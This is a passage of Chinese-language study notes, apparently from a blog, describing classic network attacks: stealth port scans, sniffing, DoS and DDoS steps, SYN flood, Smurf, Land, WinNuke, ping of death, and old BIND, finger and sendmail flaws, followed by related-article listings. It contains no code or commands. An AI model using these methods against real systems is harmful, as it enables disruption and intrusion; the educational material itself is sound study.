    3. TCP FIN扫描:对于一些操作系统,当FIN数据包到达一个关闭的端口时,会返回一个RST数据包;当端口开放时,这种数据包被忽略,不作任何应答,从而可以判断端口状态。防火墙和包过滤器会监视SYN数据包,而使用FIN数据包有时能够穿过防火墙和包过滤器,所以,这种方法较SYN扫描更为隐蔽
    4. NULL扫描:发送一个没有任何标志的TCP包到目标端口,称为NULL扫描。根据RFC 793中的连接状态图和规定,如果目标端口是关闭状态,应该返回一个RST数据包。
    5. Xmas tree扫描(圣诞树扫描):向目标端口发送一个标记为FIN、URG和PUSH数据包。根据RFC793,如果目端口是关闭状态,那么应该返回一个RST数据包。
    6. UDP扫描:按照UDP协议,当UDP数据包到达目标端口时,无论该端口是否开放,目标主机都不作任何应答,即打开的端口不会回送确认数据包、关闭的端口不会回送错误数据包。这给UDP扫描带来一定困难,但是,当数据包到达一个关闭的端口时,大部分主机会返回一个ICMP_PORT_UNREACH的错误信息数据包,据此可以判定该端口是关闭的,除此之外的其他端口是打开的。

    4.网络窃听

    在这里插入图片描述

    • 无线网络通信安全:无线网络通信相对于有线网络通信有更多的漏洞,由于无线网络固有的特点和无线网络技术本身的不成熟,如加密机制不完善缺乏数据保护安全认证机制,使得对于无线网络的探测更为简单。现有的工具,如:Network Associates公司的SnifferAirsnortWEPCrack等都可以用来实现对无线网络的网络监控和窃听。

    5.典型信息采集工具

    • nmap扫描器:nmap是当前最流行的扫描器之一,能够在全网络范围内实现ping扫描、端口扫描和操作系统检测。nmap使用操作系统堆栈指纹技术。nmap可以准确地扫描主流操作系统,还可以扫描路由器和拨号设备,还可以绕过防火墙。
    • Axcet NetRecon扫描器:能够发现、分析、报告网络的各种设备,检测它们存在的漏洞。能够扫描多种操作系统,包括Unix、Linux、Windows以及NetWare等。提供对服务器、防火墙、路由器、集线器、交换机、DNS服务器、网络打印机、Web服务器以及其他网络服务设备的测试。通过模拟入侵或攻击行为,找出并报告网络弱点,提出建议和修正措施。
    • ping Pro扫描器:以图形方式实现了大多数命令行程序功能,为网络扫描提供了方便。ping Pro可以侦查出网络上开启的端口,通过监测远程过程调用服务所使用的TCP、UDP135端口和网络会话所使用的UDP137、138和139端口来实现扫描。ping Pro只能工作在其所在网段上。
    • ISS Internet Scanner扫描器:ISS Internet Scanner可以跨网段扫描远程主机,可以检查出内部网、防火墙、Web服务器或某台主机所存在的漏洞和潜在的攻击威胁。ISS Ineternet Scanner工作于Unix和NT平台,分为三个模块:内部网、防火墙和Web服务器,可以针对不同的扫描对象制定不同的扫描方案,从而更直接的发现重要设备中潜在的隐患,在不同的模块中,用户还可以进一步定义自己的扫描参数。

    二 拒绝服务攻击

    • 拒绝服务DoS(denial of service)攻击是常用的一种攻击方式。DoS通过抢占目标主机系统资源使系统过载或崩溃,破坏和拒绝合法用户对网络、服务器等资源的访问,达到阻止合法用户使用系统的目的。
    • DoS属于破坏型攻击。*DoS对目标系统本身的破坏性并不是很大,但影响了正常的工作和生活秩序,间接损失严重,社会效应恶劣。

    1.基本的拒绝服务攻击

    • 当一个授权实体不能获得对网络资源的访问或当访问操作被严重推迟时,就称为DoS。DoS可能由网络部件的物理损坏引起,也可能由网络负荷超载所引起,还可能由不正确的使用网络协议而引起。DoS攻击有两种基本形式:目标资源匮乏型网络带宽消耗型
    • 目标资源匮乏型攻击又可分为服务过载消息流两种。
    • 服务过载指的是向目标主机的服务守护进程发送大量的服务,造成目标主机服务进程发生服务过载,拒绝向合法用户的正常使用要求提供应有的服务。
    • 消息流指攻击者向目标主机发送大量的畸形数据包,使得目标主机在重组数据包过程中发生错误,从而延缓目标主机的处理速度,阻止处理正常的事务,严重时可以造成目标主机死机。
    • 网络带宽消耗型攻击的目标是整个网络,攻击使目标网络中充斥着大量无用的、假的数据包,而使正常的数据包得不到正常的处理。
    • 拒绝服务攻击发生时的特点
    1. 消耗系统或网络资源,使系统过载或崩溃。
    2. 难以辨别真假。
    3. 使用不应存在的非法数据包来达到拒绝服务攻击的目的。
    4. 有大量的数据包来自相同的源。

    2.分布式拒绝服务攻击

    • 分布式拒绝服务DDoS(Distributed Denial of Service)攻击是一种基于DoS的特殊形式的拒绝服务攻击。是分布式的、协作的大规模攻击方式,较DoS具有更大的破坏性。
    • 分布式拒绝服务攻击的步骤:要构建DDoS攻击体系,集合众多的傀儡机进行协同工作,与入侵单台主机相比DDoS攻击要复杂得多。进行DDoS攻击的基本步骤如下:
      1. 搜集目标情况
      2. 占领傀儡机
      3. 实施攻击

    三 漏洞攻击

    • 由于应用软件和操作系统的复杂性和多样性,使得在网络信息系统的软件中存在着不易被发现的安全漏洞;现有网络技术本身存在着许多不安全性,如TCP/IP协议在设计初期并没有考虑安全性问题,其本身就有许多不完善之处。对于网络设计和管理人员而言,不合理的网络拓扑结构和不严谨的网络配置,都将不可避免的造成网络中的漏洞。对于一个复杂系统而言,漏洞的存在是不可避免的。

    1.配置漏洞攻击

    • 配置漏洞可分为系统配置漏洞网络结构配置漏洞
    • 系统配置漏洞多源于管理员的疏漏,如:共享文件配置漏洞、服务器参数配置漏洞等。
    • 网络结构配置漏洞多与网络拓扑结构有关,例如:将重要的服务设备与一般用户设备设置与同一网段,为攻击者提供了更多的可乘之机,埋下了安全隐患。
    1. 默认配置漏洞:操作系统和服务应用程序在安装时使用默认的设置,虽然方便了系统的安装过程,但默认参数实际上为攻击者留下了后门。如默认用户名和口令、默认端口和默认服务,通常都是首选的突破口和入侵点。默认的目录路径则为攻击者查找机要文件,放置后门程序提供了方便。
    2. 共享文件配置漏洞:大部分操作系统都提供了文件共享机制,方便网络资源的共享。但是共享配置不当就会暴露重要文件,攻击者能够轻易的获得机密资料。
    3. 匿名FTP:匿名FTP网络服务允许任何网络用户通过FTP访问服务器系统上指定的资源,但不适当的FTP配置,将会造成服务器系统非授权资源的泄漏。一般的匿名FTP的权限都是只读权限,即不允许匿名用户在服务器上创建文件和目录。否则,攻击者可很容易的放置木马程序,设置系统后门,为进一步的攻击提供便捷。
    4. wu-ftpd:作为FTP服务程序的wu-ftpd(Washington university FTP server daemon,华盛顿大学FTP服务器守护程序)中存在的漏洞,可以使攻击者由系统的任何账号获得root权限。

    2.协议漏洞攻击

    • Internet上现有的大部分协议在设计之初并没有考虑安全因素,使得攻击者可以利用协议固有的漏洞对目标进行攻击。操作系统在设计处理TCP/IP协议时,并没有预计到要处理非法数据包,当这种不应存在的特殊数据包出现时,许多系统会发生处理速度缓慢、停止响应和系统崩溃等不正常现象。
    1. SYN Flood攻击:SYN Flood攻击利用的是TCP协议的设计漏洞。假设一个用户向服务器发送了SYN报文后突然死机或掉线,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的。在这种情况下服务器端会重试,再次发送SYN+ACK给客户端,并等待一段时间,判定无法建立连接后,丢弃这个未完成的连接。这段等待时间称为SYN中止时间(Timeout),一般为30秒–2分钟。如果攻击者大量模拟这种情况,服务器端为了维护非常大的半连接列表就会消耗非常多的资源。此时从正常客户的角度来看,服务器已经丧失了对正常访问的响应,这便是SYN Flood攻击的机理。
    2. 循环攻击(UDP flood攻击):循环攻击利用的是UDP协议漏洞。

    在这里插入图片描述

    1. Land攻击:Land攻击的特征是IP协议中IP源地址和目标地址相同。操作系统如Window NT不知道该如何处理这种情况,就可能造成死机。
      在这里插入图片描述

    2. Smurf攻击:IP协议规定主机号为全1的地址为该网段的广播地址,路由器会把这样的数据包广播给该网络上的所有主机。Smurf攻击利用了广播数据包,可以将一个数据包“放大”为多个。攻击者伪装某源地址向一个网络广播地址发送一组ICMP回应请求数据包,这些数据包被转发到目标子网的所有主机上。由于Smurf攻击发出的是ICMP回应请求,因此所有接收到该广播包的主机将向被伪装的源地址发回ICMP回应应答。攻击者通过几百个数据包就可以产生成千上万的数据包,这样不仅可以造成目标主机的拒绝服务,而且还会使目标子网的网络本身也遭到DoS攻击。

    3. WinNuke攻击:操作系统在设计处理TCP数据包时,都严格遵循了TCP状态机,但遇到不符合状态机的数据包时,若不知所措,就可能造成死机。WinNuke攻击首先发送一个设置了URG标志的TCP数据包,当操作系统接收到这样的数据包时,说明有紧急情况发生,并且,操作系统要求得到进一步的数据,以说明具体情况。此时,攻击者发送一个RST数据包,构造了TCP状态机中不会出现的数据包,若操作系统(如未打补丁的Windows NT)不能正确处理,就会死机,使连接异常终止,服务中断。

    4. Fraggle攻击:Fraggle攻击发送畸形UDP碎片,使得被攻击者在重组过程中发生未加预料的错误,导致系统崩溃。典型的Fraggle攻击使用的技术有:碎片偏移位的错乱强制发送超大数据包等。例如:一个长为40字节的数据在发送时被分为两段,包含第一段数据的数据包发送了数据036字节,包含第二段数据的数据包在正常情况下应该是3740的4个字节,但攻击者构造并指定第二个数据包中包含第二段数据且为数据的24–27字节来迷惑操作系统,导致系统崩溃。

    5. Ping to death攻击:根据有关IP协议规定的RFC791,占有16位的总长度控制字确定了IP包的总长度为65535字节,其中包括IP数据包的包头长度。Ping to death攻击发送超大尺寸的ICMP数据包,使得封装该ICMP数据包的IP数据包大于65535字节,目标主机无法重新组装这种数据包分片,可能造成缓冲区溢出、系统崩溃。

    3.程序漏洞攻击

    • 由于编写程序的复杂性和程序运行环境的不可预见性,使得程序难免存在漏洞。程序漏洞攻击成为攻击者非法获得目标主机控制权的主要手段
    1. 缓冲区溢出攻击的原理:缓冲区溢出攻击是利用系统、服务、应用程序中存在的漏洞,通过恶意填写内存区域,使内存区域溢出,导致应用程序、服务甚至系统崩溃,无法提供应有的服务来实现攻击目的。不检测边界是造成缓冲区溢出的主要原因。UNIX主要设计语言是C语言,而C语言缺乏边界检测,若不检查数组的越界访问,就会留下基于堆栈攻击的隐患。UNIX进程在内存中分为正文段、数据段和堆栈段。堆栈段用于为动态变量分配空间和临时保存函数调用的参数和返回地址。动态分配是UNIX程序采用的主要方法,但是,若动态变量从栈中分配空间时没有作边界检查,则可能发生缓冲区溢出,造成段越界。
    2. BIND漏洞攻击:运行在DNS服务器上的BIND(Berkeley internet name domain,Berkeley internet名字域)DNS服务器软件是最易遭受攻击的软件之一。BIND存在的脆弱性可以对系统造成根级的安全威胁。如BIND 8.2版本存在漏洞,攻击者伪装成DNS服务器,发送一个大的NXT记录(next,域中不存在的名字被标定为NXT类型),并在记录中包含攻击代码,使存在漏洞的DNS服务器缓冲区溢出,从而获得root权限。
    3. Finger漏洞攻击:Solaris自带的Finger服务器存在如下一些漏洞:当攻击者在向Finger服务器提交以数字做用户名的询问请求时,Finger服务器会把日志文件wtmp(wtmp一个用户每次登录和退出时间的记录)中所有的用户名返回给攻击者。当攻击者对服务器进行finger查询时,如果询问一个不存在的用户,服务器会返回一个带“.”的回答,这可能造成攻击者用暴力法判断系统上存在的用户。
    4. Sendmail漏洞攻击:在旧版本的sendmail中,为解决反向编码的问题,数据库中包含一个decode入口,这个UNIX程序可以将一个以纯文本编码的二进制文件,转化为原有的二进制的形式和名字。反向编码完全尊重被编码的文件,例如当一个名为bar.uu的文件声称其原始文件是/home/foo/.rhosts时,则反编码程序将试图转化bar.uu文件为foo下的.rhosts文件。一般情况下sendmail将undecode作为半特权用户后台程序运行,所以email发出的编码文件不会覆盖任何系统文件。但是,如果目标程序是全局可写的,那么编码程序允许远程用户修改这些文件,使攻击者可以放置木马,留下后门,达到攻击目的。
    展开全文
  • 网络攻击介绍

    千次阅读 2019-05-16 16:53:43
    网络攻击介绍 网络攻击简介: 网络攻击(Cyberattack,也译为赛博攻击)是指针对计算机信息系统、基础设施、计算机网络或个人计算机设备的,任何类型的进攻动作。 于计算机和计算机网络中,破坏、揭露、修改、使软件...
  • 网络攻击方法分析与防范措施

    万次阅读 多人点赞 2018-05-13 13:42:04
    推荐阅读(仅仅三页内容):常见网络攻击手段分析及防御原理 一个网站建立以后,如果不注意安全方面的问题,很容易被人攻击,下面我就总结几种常见的漏洞的简介与攻击原理分析 前奏: 什么是网络安全 ...
  • 网络攻击之信息收集阶段

    千次阅读 2021-02-21 13:30:00
    信息收集是网络攻击中的第一步,是最关键的阶段,也是耗费时间最长的阶段。但信息的收集也不只在攻击前进行,能夹杂在攻击的不同阶段进行,本文讲解了信息收集的内容及方法
  • 常见网络攻击原理

    千次阅读 2018-02-09 21:58:17
    通常我们常见的网络攻击类型有以下几种:IP欺骗,ARP欺骗,TCP欺骗,DNS欺骗。1.IP欺骗原理 2.ARP欺骗原理3.TCP欺骗原理4.DNS欺骗原理
  • 常见的网络攻击类型

    万次阅读 2019-02-20 12:23:46
    常见的网络攻击类型 一、拒绝服务攻击 1.拒绝服务攻击 Dos(Denial of Service)是一种利用合理的服务请求占用过多的服务资源,从而使合法用户无法得到服务响应的网络攻击行为。 被DOS攻击时的现象大致有: 被...
  • 常见的网络攻击有哪些 首先呢简单介绍一下目前常见的几种网络攻击: XSS攻击、SQL注入、CSRF攻击、上传文件攻击、DDos攻击 XSS攻击:Cross Site Script跨站脚本攻击,它指的是恶意攻击者往Web页面里插入恶意的...
  • 网络攻击与防御基本概念

    千次阅读 2020-06-14 16:40:22
    文章目录网络安全防护技术网络攻击技术基础4.1 网络攻击的一般步骤网络防御技术基础5.1 面对攻击者的扫描,可采取的主要防御措施有:5.3欺骗攻击防御技术5.4 拒绝服务攻击防御5.5 木马攻击防御技术5.6 缓冲区溢出...
  • 10种防止网络攻击的方法

    千次阅读 2018-12-25 21:43:09
    10种防止网络攻击的方法 随着威胁形势的不断发展,建立全面的网络安全解决方案需要外围安全性和主动的网内防御 。随着网络攻击的范围,规模和频率不断增加,网络卫生正变得越来越重要。与个人卫生相似,网络卫生是指...
  • 网络攻击行为分析

    千次阅读 2019-06-22 22:15:12
    1、网络攻击行为过程分析-步骤 攻击准备 破坏型攻击指的破坏目标,使其不能正常工作,而不是控制目标系统的运行 入侵型攻击,这种攻击是要获得一定的权限达到控制攻击目标或者窃取信息的目的 攻击实施 破坏性...
  • 常见网络攻击原理及其防御

    万次阅读 多人点赞 2019-02-22 18:44:16
    常见的网络攻击,按照osi七层协议,可以分为: 1,物理层 线路侦听 2,数据链路层 mac_flood 3,网络层 arp_poison,icmp_redirection 4,传输层 tcp_flood(包含ack_flood和syn_flood),udp_flood(ntp,dns) 7,应用...
  • 1、什么是VPN服务?虚拟专用网络(或VPN)是您的设备与另一台计算机之间通过互联网的安全连接。VPN服务可用于在离开办公室时安全地访问工作计算机系统。但它们也常用于规避政府审查制度,或者...
  • 网络攻击方法及工具

    千次阅读 2019-05-14 09:39:14
    网络攻击方法及工具 文章目录网络攻击方法及工具攻击方法网络监听sniffer口令破解字典文件拒绝服务攻击服务器端口攻击同步包风暴smurf攻击利用处理程序错误pingofdeathTeardropwinnukeLand电子邮件轰炸低速率拒绝...
  • 常见的网络攻击攻防方法

    万次阅读 多人点赞 2017-09-19 14:58:37
    常见的网络攻击,按照osi七层协议,可以分为: 1,物理层 线路侦听 2,数据链路层 mac_flood 3,网络层 arp_poison,icmp_redirection 4,传输层 tcp_flood(包含ack_flood和syn_flood),udp_flood(ntp,dns) 7,...
  • 常见网络攻击案例

    千次阅读 2018-11-30 08:27:13
    1. tcp半链接攻击 tcp半链接攻击也称为:SYN Flood (SYN洪水),是种典型的DoS (Denial of Service,拒绝服务) 攻击,效果就是服务器TCP连接资源耗尽,停止响应正常的TCP连接请求 1.1 正常链接时的情况 1.2 半...
  • 网络攻击与防御技术期中习题

    万次阅读 2019-11-28 16:24:39
    1、简述网络安全的定义。 答:网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因无意或恶意威胁而遭到破坏、更改、泄露,从而保证网络系统连续、可靠、正常地运行,网络服务不中断。 2、简述网络...
  • 网络攻击与防御技术期末习题

    千次阅读 2019-11-28 16:26:19
    网络中,所谓“防火墙”,是指一种将内部网和公众访问网如Internet)分开的方法,它实际上是一种隔离技术 ,在两个网络 通信时执行的一种访问控制尺度,它能允许用户“同意”的人和数据进人该用户的网络,同时将用户...
  • 常见的网络攻击手段有哪些?

    千次阅读 2021-03-16 11:59:05
    随着互联网的持续发展,企业日益重视网络安全问题,如何防御网络攻击成了每个管理人员的必修课。 知己知彼才能百战不殆。对于网络安全来说,成功防御的一个基本组成部分就是要了解敌人。网络安全管理人员必须了解...
  • 网络攻击的分类

    千次阅读 2018-11-17 16:59:38
    在高层次,攻击被分为两类: 主动攻击:包含攻击者访问其所需要信息的故意行为。比如远程登录到指定机器的25号端口找出公司运行的邮件服务器的信息等。攻击者是在主动地做一些不利于用户或用户公司的事情。 被动...
  • 常见的网络攻击技术

    千次阅读 2019-03-29 08:19:36
    一、跨站脚本攻击二、跨站请求伪 一、跨站脚本攻击 概念 跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript。 攻击原理 例如有一个论坛网站,...
  • 常见的网络攻击有哪些?

    千次阅读 2019-04-13 16:17:50
    近期的网络攻击有些频繁,晚上凌晨左右一般会接好几个电话,反映的都是不同的网络攻击。有些病毒攻击不在我们的解决范围内,今天墨者安全主要针对DDOS攻击,CC攻击防御的等给大家分享一些常见的网络攻击类型。 CC...
  • 网络攻击是导致网络安全威胁的主要原因,嗅探攻击、截获攻击、拒绝服务攻击等是常见的网络攻击网络攻击和网络安全是矛盾的两个方面,但是了解网络攻击手段可以帮助我们更好地保护网络安全。嗅探攻击是被动攻击,...
  • 常见的网络攻击方式与防护

    千次阅读 2018-09-13 11:59:11
    然后看内容写着“请注意基本的安全设计”,这肯定是哪个师兄或者老师给我的一个提醒,然后立马起床把这个漏洞修复了,然后仔细去学了一下常见的网络攻击与防护。也是非常感谢这位提醒的朋友,让我学到了新知识,这篇...
  • 网络攻击与防御期末考试知识点

    万次阅读 2018-03-16 10:53:11
     网络安全构成威胁的因素:l 环境因素,l 人为因素和l 系统自身因素(硬件软件协议的缺陷与漏洞),其中人为因素包括:恶意的(恶意攻击、违纪、违法和犯罪)和无意的(如工作疏忽造成失误、配置不当等)4....
  • 【期末复习】网络攻击与防御

    万次阅读 2019-01-05 23:16:21
    网络攻击技术 一、隐藏攻击者的地址和身份 1.IP地址欺骗或盗用技术:源IP地址为假冒或虚假 2.MAC地址盗用技术:修改注册表或使用ifconfig命令  3.通过Proxy隐藏技术:作为攻击跳板;实际上很难真正实现隐藏 ...
  • 常见网络攻击方式

    千次阅读 2017-08-25 17:38:31
    摘要网络攻击有多种形式,合拢而来, 可简单分为四类攻击。1、人性式攻击:如钓鱼式攻击、社会工程学攻击,这些攻击方式,技术含量往往很低,针对就是人性。有点骗子攻击的味道。著名黑客菲特尼客,以这种攻击为特长...
  • 浅谈常见网络攻击以及防御

    千次阅读 2019-06-11 15:57:08
    常见的网络攻击主要有xss攻击,csrf攻击和sql注入等。 一、XSS,即 Cross Site Script,中译是跨站脚本攻击。 XSS 攻击是指攻击者在网站上注入恶意的客户端代码,从而在用户使用浏览器进行访问时,获得用户隐私...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 300,644
精华内容 120,257
关键字:

网络攻击